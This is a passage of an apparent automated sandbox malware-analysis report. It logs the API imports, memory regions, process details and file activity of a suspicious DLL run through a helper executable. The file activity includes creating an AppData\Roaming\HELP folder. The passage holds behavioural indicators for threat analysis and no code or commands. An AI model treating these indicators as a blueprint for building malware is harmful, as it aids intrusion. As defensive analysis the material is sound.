| Get Address | c:\windows\system32\kernel32.dll | function = DecodePointer, address_out = 0x77f1cd10 |
|
3 | |
| Get Address | c:\windows\system32\kernel32.dll | function = IsProcessorFeaturePresent, address_out = 0x762276b5 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetProcAddress, address_out = 0x762233d3 |
|
2 | |
| Get Address | c:\windows\system32\ws2_32.dll | function = WSAStartup, address_out = 0x77513ab2 |
|
1 | |
| Get Address | c:\windows\system32\ws2_32.dll | function = WSACleanup, address_out = 0x77513c5f |
|
1 | |
| Get Address | c:\windows\system32\ws2_32.dll | function = gethostbyname, address_out = 0x77527673 |
|
1 | |
| Get Address | c:\windows\system32\ws2_32.dll | function = inet_ntoa, address_out = 0x7751b131 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CreateFileA, address_out = 0x7621cee8 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = WriteFile, address_out = 0x76221400 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CloseHandle, address_out = 0x7621ca7c |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FindFirstFileA, address_out = 0x76222d89 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FindNextFileA, address_out = 0x7621a187 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FindClose, address_out = 0x76220e62 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = DeleteFileA, address_out = 0x762147cb |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FileTimeToSystemTime, address_out = 0x76221dfe |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = SetFilePointer, address_out = 0x7621db36 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CreateProcessA, address_out = 0x761d2082 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = WaitForSingleObject, address_out = 0x7621ba90 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = ReadFile, address_out = 0x762196fb |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CreateEventW, address_out = 0x76223386 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetSystemDirectoryA, address_out = 0x76218fc5 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetWindowsDirectoryW, address_out = 0x762104b6 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetTempPathA, address_out = 0x76236a65 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetTempPathW, address_out = 0x76208b33 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetLocalTime, address_out = 0x7621a90e |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetComputerNameW, address_out = 0x762103ff |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetSystemInfo, address_out = 0x76223728 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetVersionExW, address_out = 0x76213b1a |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetEnvironmentVariableA, address_out = 0x7621ce2e |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CopyFileA, address_out = 0x7623532c |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetLastError, address_out = 0x7621bf00 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = SetFileAttributesA, address_out = 0x76208cb9 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetFileSize, address_out = 0x76210273 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CreateDirectoryA, address_out = 0x762368da |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = TerminateProcess, address_out = 0x76212331 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = LoadLibraryW, address_out = 0x76223c01 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = LoadLibraryA, address_out = 0x7622395c |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = MultiByteToWideChar, address_out = 0x7622452b |
|
1 | |
| Get Address | c:\windows\system32\advapi32.dll | function = RegCreateKeyExA, address_out = 0x76711469 |
|
1 | |
| Get Address | c:\windows\system32\advapi32.dll | function = RegEnumValueA, address_out = 0x7670cf49 |
|
1 | |
| Get Address | c:\windows\system32\advapi32.dll | function = RegDeleteValueA, address_out = 0x7672a4ea |
|
1 | |
| Get Address | c:\windows\system32\advapi32.dll | function = RegCloseKey, address_out = 0x7671469d |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = memset, address_out = 0x77729790 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = memcpy, address_out = 0x77729910 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = memcmp, address_out = 0x77737975 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = malloc, address_out = 0x77729cee |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = free, address_out = 0x77729894 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = strchr, address_out = 0x7772dbeb |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = strncpy, address_out = 0x777308a9 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = atoi, address_out = 0x7772dbe0 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = _snwprintf, address_out = 0x777495d1 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = strncat, address_out = 0x77750909 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = strstr, address_out = 0x7772de4a |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = strlen, address_out = 0x777343d3 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = strrchr, address_out = 0x7772dbae |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = _snprintf, address_out = 0x7774fa7c |
|
1 | |
| Get Address | c:\windows\system32\user32.dll | function = OemToCharA, address_out = 0x77b2f041 |
|
1 | |
| Get Address | c:\windows\system32\user32.dll | function = wsprintfA, address_out = 0x77ae3f47 |
|
1 | |
| Get Address | c:\windows\system32\user32.dll | function = wsprintfW, address_out = 0x77af426d |
|
1 |
System (5)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Time | type = System Time, time = 2018-04-29 13:06:28 (UTC) |
|
2 | |
| Get Time | type = Ticks, time = 98530 |
|
1 | |
| Get Info | type = System Directory, result_out = C:\Windows\system32 |
|
2 |
Environment (3)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | - |
|
1 | |
| Get Environment String | name = APPDATA, result_out = C:\Users\EEBsYm5\AppData\Roaming |
|
2 |
Process #61: gorctexxzx.exe
118
0
| Information | Value |
|---|---|
| ID | #61 |
| File Name | c:\windows\system32\gorctexxzx.exe |
| Command Line | "C:\Windows\System32\goRcteXxZX.exe" /dll="C:\Users\EEBsYm5\Desktop\97328F~1.DLL" /fn_id=DllGetClassObject /fn_args="iexplore.exe" |
| Initial Working Directory | C:\Windows\system32\ |
| Monitor | Start Time: 00:00:35, Reason: Child Process |
| Unmonitor | End Time: 00:02:29, Reason: Terminated by Timeout |
| Monitor Duration | 00:01:54 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xd68 |
| Parent PID | 0xa3c (c:\windows\system32\gorctexxzx.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | CRH2YWU7\EEBsYm5 |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
D6C
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000010000 | 0x00010000 | 0x0002ffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000020000 | 0x00020000 | 0x00020fff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000030000 | 0x00030000 | 0x00033fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x0000000000040000 | 0x00040000 | 0x00040fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| locale.nls | 0x00050000 | 0x000b6fff | Memory Mapped File | Readable |
|
|
|
- |
| private_0x00000000000c0000 | 0x000c0000 | 0x000c0fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000000f0000 | 0x000f0000 | 0x001effff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000001f0000 | 0x001f0000 | 0x0023ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000240000 | 0x00240000 | 0x0024ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000002e0000 | 0x002e0000 | 0x003dffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x00000000003e0000 | 0x003e0000 | 0x004a7fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x00000000004b0000 | 0x004b0000 | 0x005b0fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x00000000005c0000 | 0x005c0000 | 0x011bffff | Pagefile Backed Memory | Readable |
|
|
|
- |
| gorctexxzx.exe | 0x011d0000 | 0x011f0fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| private_0x0000000001200000 | 0x01200000 | 0x0133ffff | Private Memory | Readable, Writable |
|
|
|
- |
| api-ms-win-core-synch-l1-2-0.dll | 0x72db0000 | 0x72db2fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| 97328f~1.dll | 0x72ee0000 | 0x72f24fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| kernelbase.dll | 0x75f70000 | 0x75fb9fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| kernel32.dll | 0x761d0000 | 0x762a3fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| imm32.dll | 0x762b0000 | 0x762cefff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| nsi.dll | 0x762d0000 | 0x762d5fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| sechost.dll | 0x762e0000 | 0x762f8fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| shlwapi.dll | 0x76300000 | 0x76356fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| lpk.dll | 0x765f0000 | 0x765f9fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| advapi32.dll | 0x76700000 | 0x7679ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| shell32.dll | 0x767a0000 | 0x773e9fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| usp10.dll | 0x773f0000 | 0x7748cfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| ws2_32.dll | 0x77510000 | 0x77544fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| rpcrt4.dll | 0x77550000 | 0x775f0fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| msvcrt.dll | 0x77720000 | 0x777cbfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| ole32.dll | 0x77970000 | 0x77acbfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| user32.dll | 0x77ad0000 | 0x77b98fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| msctf.dll | 0x77ba0000 | 0x77c6bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| gdi32.dll | 0x77c80000 | 0x77ccdfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| apisetschema.dll | 0x77e80000 | 0x77e80fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| ntdll.dll | 0x77ec0000 | 0x77ffbfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| pagefile_0x000000007f6f0000 | 0x7f6f0000 | 0x7f7effff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x000000007ffb0000 | 0x7ffb0000 | 0x7ffd2fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x000000007ffdb000 | 0x7ffdb000 | 0x7ffdbfff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000000007ffdf000 | 0x7ffdf000 | 0x7ffdffff | Private Memory | Readable, Writable |
|
|
|
- |
Host Behavior
File (9)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Windows\system32\win.com | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Windows\system32\kernel32.dll | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create Directory | C:\Users\EEBsYm5\AppData\Roaming\HELP | - |
|
1 | |
| Create Directory | C:\Users\EEBsYm5\AppData\Roaming\HELP\system32\ | - |
|
1 | |
| Get Info | C:\Windows\system32\win.com | type = time |
|
1 | |
| Get Info | C:\Windows\system32\kernel32.dll | type = time |
|
1 | |
| Open | STD_INPUT_HANDLE | - |
|
1 | |
| Open | STD_OUTPUT_HANDLE | - |
|
1 | |
| Open | STD_ERROR_HANDLE | - |
|
1 |
Module (101)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Load | kernel32.dll | base_address = 0x761d0000 |
|
2 | |
| Load | ws2_32.dll | base_address = 0x77510000 |
|
1 | |
| Load | advapi32.dll | base_address = 0x76700000 |
|
1 | |
| Load | msvcrt.dll | base_address = 0x77720000 |
|
1 | |
| Load | user32.dll | base_address = 0x77ad0000 |
|
1 | |
| Get Handle | c:\windows\system32\kernel32.dll | base_address = 0x761d0000 |
|
12 | |
| Get Filename | - | process_name = c:\windows\system32\gorctexxzx.exe, file_name_orig = C:\Windows\System32\goRcteXxZX.exe, size = 260 |
|
6 | |
| Get Filename | - | process_name = c:\windows\system32\gorctexxzx.exe, file_name_orig = C:\Users\EEBsYm5\Desktop\97328F~1.DLL, size = 260 |
|
3 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FlsAlloc, address_out = 0x7622418d |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FlsGetValue, address_out = 0x76221e16 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FlsSetValue, address_out = 0x762276e6 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FlsFree, address_out = 0x76221f61 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = EncodePointer, address_out = 0x77f1a295 |
|
8 | |
| Get Address | c:\windows\system32\kernel32.dll | function = DecodePointer, address_out = 0x77f1cd10 |
|
3 | |
| Get Address | c:\windows\system32\kernel32.dll | function = IsProcessorFeaturePresent, address_out = 0x762276b5 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetProcAddress, address_out = 0x762233d3 |
|
2 | |
| Get Address | c:\windows\system32\ws2_32.dll | function = WSAStartup, address_out = 0x77513ab2 |
|
1 | |
| Get Address | c:\windows\system32\ws2_32.dll | function = WSACleanup, address_out = 0x77513c5f |
|
1 | |
| Get Address | c:\windows\system32\ws2_32.dll | function = gethostbyname, address_out = 0x77527673 |
|
1 | |
| Get Address | c:\windows\system32\ws2_32.dll | function = inet_ntoa, address_out = 0x7751b131 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CreateFileA, address_out = 0x7621cee8 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = WriteFile, address_out = 0x76221400 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CloseHandle, address_out = 0x7621ca7c |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FindFirstFileA, address_out = 0x76222d89 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FindNextFileA, address_out = 0x7621a187 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FindClose, address_out = 0x76220e62 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = DeleteFileA, address_out = 0x762147cb |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FileTimeToSystemTime, address_out = 0x76221dfe |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = SetFilePointer, address_out = 0x7621db36 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CreateProcessA, address_out = 0x761d2082 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = WaitForSingleObject, address_out = 0x7621ba90 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = ReadFile, address_out = 0x762196fb |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CreateEventW, address_out = 0x76223386 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetSystemDirectoryA, address_out = 0x76218fc5 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetWindowsDirectoryW, address_out = 0x762104b6 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetTempPathA, address_out = 0x76236a65 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetTempPathW, address_out = 0x76208b33 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetLocalTime, address_out = 0x7621a90e |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetComputerNameW, address_out = 0x762103ff |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetSystemInfo, address_out = 0x76223728 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetVersionExW, address_out = 0x76213b1a |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetEnvironmentVariableA, address_out = 0x7621ce2e |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CopyFileA, address_out = 0x7623532c |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetLastError, address_out = 0x7621bf00 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = SetFileAttributesA, address_out = 0x76208cb9 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetFileSize, address_out = 0x76210273 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CreateDirectoryA, address_out = 0x762368da |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = TerminateProcess, address_out = 0x76212331 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = LoadLibraryW, address_out = 0x76223c01 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = LoadLibraryA, address_out = 0x7622395c |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = MultiByteToWideChar, address_out = 0x7622452b |
|
1 | |
| Get Address | c:\windows\system32\advapi32.dll | function = RegCreateKeyExA, address_out = 0x76711469 |
|
1 | |
| Get Address | c:\windows\system32\advapi32.dll | function = RegEnumValueA, address_out = 0x7670cf49 |
|
1 | |
| Get Address | c:\windows\system32\advapi32.dll | function = RegDeleteValueA, address_out = 0x7672a4ea |
|
1 | |
| Get Address | c:\windows\system32\advapi32.dll | function = RegCloseKey, address_out = 0x7671469d |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = memset, address_out = 0x77729790 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = memcpy, address_out = 0x77729910 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = memcmp, address_out = 0x77737975 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = malloc, address_out = 0x77729cee |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = free, address_out = 0x77729894 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = strchr, address_out = 0x7772dbeb |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = strncpy, address_out = 0x777308a9 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = atoi, address_out = 0x7772dbe0 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = _snwprintf, address_out = 0x777495d1 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = strncat, address_out = 0x77750909 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = strstr, address_out = 0x7772de4a |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = strlen, address_out = 0x777343d3 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = strrchr, address_out = 0x7772dbae |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = _snprintf, address_out = 0x7774fa7c |
|
1 | |
| Get Address | c:\windows\system32\user32.dll | function = OemToCharA, address_out = 0x77b2f041 |
|
1 | |
| Get Address | c:\windows\system32\user32.dll | function = wsprintfA, address_out = 0x77ae3f47 |
|
1 | |
| Get Address | c:\windows\system32\user32.dll | function = wsprintfW, address_out = 0x77af426d |
|
1 |
System (5)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Time | type = System Time, time = 2018-04-29 13:06:28 (UTC) |
|
2 | |
| Get Time | type = Ticks, time = 98592 |
|
1 | |
| Get Info | type = System Directory, result_out = C:\Windows\system32 |
|
2 |
Environment (3)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | - |
|
1 | |
| Get Environment String | name = APPDATA, result_out = C:\Users\EEBsYm5\AppData\Roaming |
|
2 |
Process #62: gorctexxzx.exe
118
0
| Information | Value |
|---|---|
| ID | #62 |
| File Name | c:\windows\system32\gorctexxzx.exe |
| Command Line | "C:\Windows\System32\goRcteXxZX.exe" /dll="C:\Users\EEBsYm5\Desktop\97328F~1.DLL" /fn_id=DllRegisterServer /fn_args="iexplore.exe" |
| Initial Working Directory | C:\Windows\system32\ |
| Monitor | Start Time: 00:00:35, Reason: Child Process |
| Unmonitor | End Time: 00:02:29, Reason: Terminated by Timeout |
| Monitor Duration | 00:01:54 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xd74 |
| Parent PID | 0xa3c (c:\windows\system32\gorctexxzx.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | CRH2YWU7\EEBsYm5 |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
D78
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000010000 | 0x00010000 | 0x0002ffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000020000 | 0x00020000 | 0x00020fff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000030000 | 0x00030000 | 0x00033fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x0000000000040000 | 0x00040000 | 0x00040fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x0000000000050000 | 0x00050000 | 0x00050fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000000b0000 | 0x000b0000 | 0x001affff | Private Memory | Readable, Writable |
|
|
|
- |
| locale.nls | 0x001b0000 | 0x00216fff | Memory Mapped File | Readable |
|
|
|
- |
| pagefile_0x0000000000220000 | 0x00220000 | 0x002e7fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x0000000000300000 | 0x00300000 | 0x003fffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000400000 | 0x00400000 | 0x00500fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x00000000005c0000 | 0x005c0000 | 0x005cffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x00000000005d0000 | 0x005d0000 | 0x011cffff | Pagefile Backed Memory | Readable |
|
|
|
- |
| gorctexxzx.exe | 0x011d0000 | 0x011f0fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| private_0x0000000001200000 | 0x01200000 | 0x0134ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000001200000 | 0x01200000 | 0x012fffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000001340000 | 0x01340000 | 0x0134ffff | Private Memory | Readable, Writable |
|
|
|
- |
| api-ms-win-core-synch-l1-2-0.dll | 0x72db0000 | 0x72db2fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| 97328f~1.dll | 0x72ee0000 | 0x72f24fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| kernelbase.dll | 0x75f70000 | 0x75fb9fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| kernel32.dll | 0x761d0000 | 0x762a3fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| imm32.dll | 0x762b0000 | 0x762cefff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| nsi.dll | 0x762d0000 | 0x762d5fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| sechost.dll | 0x762e0000 | 0x762f8fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| shlwapi.dll | 0x76300000 | 0x76356fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| lpk.dll | 0x765f0000 | 0x765f9fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| advapi32.dll | 0x76700000 | 0x7679ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| shell32.dll | 0x767a0000 | 0x773e9fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| usp10.dll | 0x773f0000 | 0x7748cfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| ws2_32.dll | 0x77510000 | 0x77544fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| rpcrt4.dll | 0x77550000 | 0x775f0fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| msvcrt.dll | 0x77720000 | 0x777cbfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| ole32.dll | 0x77970000 | 0x77acbfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| user32.dll | 0x77ad0000 | 0x77b98fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| msctf.dll | 0x77ba0000 | 0x77c6bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| gdi32.dll | 0x77c80000 | 0x77ccdfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| apisetschema.dll | 0x77e80000 | 0x77e80fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| ntdll.dll | 0x77ec0000 | 0x77ffbfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| pagefile_0x000000007f6f0000 | 0x7f6f0000 | 0x7f7effff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x000000007ffb0000 | 0x7ffb0000 | 0x7ffd2fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x000000007ffde000 | 0x7ffde000 | 0x7ffdefff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000000007ffdf000 | 0x7ffdf000 | 0x7ffdffff | Private Memory | Readable, Writable |
|
|
|
- |
Host Behavior
File (9)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Windows\system32\win.com | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Windows\system32\kernel32.dll | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create Directory | C:\Users\EEBsYm5\AppData\Roaming\HELP | - |
|
1 | |
| Create Directory | C:\Users\EEBsYm5\AppData\Roaming\HELP\system32\ | - |
|
1 | |
| Get Info | C:\Windows\system32\win.com | type = time |
|
1 | |
| Get Info | C:\Windows\system32\kernel32.dll | type = time |
|
1 | |
| Open | STD_INPUT_HANDLE | - |
|
1 | |
| Open | STD_OUTPUT_HANDLE | - |
|
1 | |
| Open | STD_ERROR_HANDLE | - |
|
1 |
Module (101)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Load | kernel32.dll | base_address = 0x761d0000 |
|
2 | |
| Load | ws2_32.dll | base_address = 0x77510000 |
|
1 | |
| Load | advapi32.dll | base_address = 0x76700000 |
|
1 | |
| Load | msvcrt.dll | base_address = 0x77720000 |
|
1 | |
| Load | user32.dll | base_address = 0x77ad0000 |
|
1 | |
| Get Handle | c:\windows\system32\kernel32.dll | base_address = 0x761d0000 |
|
12 | |
| Get Filename | - | process_name = c:\windows\system32\gorctexxzx.exe, file_name_orig = C:\Windows\System32\goRcteXxZX.exe, size = 260 |
|
6 | |
| Get Filename | - | process_name = c:\windows\system32\gorctexxzx.exe, file_name_orig = C:\Users\EEBsYm5\Desktop\97328F~1.DLL, size = 260 |
|
3 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FlsAlloc, address_out = 0x7622418d |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FlsGetValue, address_out = 0x76221e16 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FlsSetValue, address_out = 0x762276e6 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FlsFree, address_out = 0x76221f61 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = EncodePointer, address_out = 0x77f1a295 |
|
8 | |
